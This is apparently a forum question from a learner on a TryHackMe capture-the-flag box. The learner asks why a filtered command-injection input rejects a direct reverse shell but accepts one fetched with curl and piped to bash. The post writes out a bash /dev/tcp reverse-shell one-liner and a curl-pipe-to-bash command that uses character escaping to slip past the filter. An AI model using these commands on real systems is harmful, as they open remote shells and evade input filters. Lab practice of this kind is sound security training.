2

So im doing some pentesting in a TryHackme box (Chill Hack) and I've come to some trouble. In this box I have available an input in a website where I can inject commands to the vulnerable system.

This input has filters so I cannot use bash nor netcat without escaping the command characters.

Messing around I tried getting a reverse shell by using that input with netcat, of course escaped so the command should work.

The problem is the direct command does not work. Checking the walkthrough I've seen that the solution is to prepare a Bash shell (bash -i >& /dev/tcp/10.0.0.1/8080 0>&1), set up a web server and curl my attacking machine in order to pipe it to the bash command (Something like this: curl 10.9.223.50/shell.sh | ba\sh)

Doing so provides me with a webshell.

The thing I don't understand is, why using the exact same command (The bash shell) in the input and escaping characters for avoiding any problem with that the command does not work but it does work when piping through the curl command?

alex55132
  • 23
  • 4
  • You already know the answer: `This input has filters...` The curl command bypasses filters that the direct bash one-liner does not. The question is what kind of filters you are dealing with, and the shell will help you with that. – ThoriumBR Jan 14 '21 at 00:22
  • Yeah but the filters can be bypassed by escaping the characters of the commad, which I've already done to create the reverse shell. It makes no sense to me that let me pipe the output from the shell.sh to bash since bash is filtered and works but doesn't work using the command individually @ThoriumBR – alex55132 Jan 14 '21 at 08:19

0 Answers0